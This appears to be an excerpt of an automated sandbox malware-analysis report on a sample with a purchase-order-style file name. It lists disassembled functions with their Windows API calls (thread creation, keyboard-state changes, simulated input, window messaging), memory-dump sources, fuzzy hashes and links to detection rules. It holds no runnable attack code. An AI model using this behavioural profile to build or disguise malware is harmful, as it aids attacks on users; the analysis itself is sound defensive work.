                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                        • String ID:
                                                        • API String ID: 155776804-0
                                                        • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                        • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                        • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                        • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                        Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                          • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                        • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                        • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                        • String ID:
                                                        • API String ID: 1957940570-0
                                                        • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                        • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                        • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                        • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                        Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                        • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                        • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                        • ExitThread.KERNEL32 ref: 00413D4E
                                                        • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                        • __freefls@4.LIBCMT ref: 00413D74
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                        • String ID:
                                                        • API String ID: 259663610-0
                                                        • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                        • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                        • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                        • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                        Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClientRect.USER32(?,?), ref: 004302E6
                                                        • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                        • GetClientRect.USER32(?,?), ref: 00430364
                                                        • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                        • GetWindowRect.USER32(?,?), ref: 004303C3
                                                        • ScreenToClient.USER32(?,?), ref: 004303EC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Rect$Client$Window$MetricsScreenSystem
                                                        • String ID:
                                                        • API String ID: 3220332590-0
                                                        • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                        • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                        • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                        • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                        Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _malloc_wcslen$_strcat_wcscpy
                                                        • String ID:
                                                        • API String ID: 1612042205-0
                                                        • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                        • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                        • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                        • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                        Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove_strncmp
                                                        • String ID: >$U$\
                                                        • API String ID: 2666721431-237099441
                                                        • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                        • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                        • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                        • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                        Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 0044C570
                                                        • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                        • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                        • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                        • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$InputSend
                                                        • String ID:
                                                        • API String ID: 2221674350-0
                                                        • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                        • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                        • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                        • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                        Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$_wcscat
                                                        • String ID:
                                                        • API String ID: 2037614760-0
                                                        • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                        • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                        • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                        • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                        Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                        • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                        • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                        • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                        • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                        • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Variant$Copy$AllocClearErrorLastString
                                                        • String ID:
                                                        • API String ID: 960795272-0
                                                        • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                        • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                        • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                        • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                        Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                        • EndPaint.USER32(?,?), ref: 00447D13
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                        • String ID:
                                                        • API String ID: 4189319755-0
                                                        • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                        • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                        • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                        • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                        Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                        • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                        • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow$InvalidateRect
                                                        • String ID:
                                                        • API String ID: 1976402638-0
                                                        • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                        • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                        • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                        • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                        Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                        • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                        • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                        • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                        • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$Enable$MessageSend
                                                        • String ID:
                                                        • API String ID: 642888154-0
                                                        • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                        • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                        • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                        • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                        Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Variant$Copy$ClearErrorLast
                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                        • API String ID: 2487901850-572801152
                                                        • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                        • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                        • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                        • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                        Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$Enable$Show$MessageSend
                                                        • String ID:
                                                        • API String ID: 1871949834-0
                                                        • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                        • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                        • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                        • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                        Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
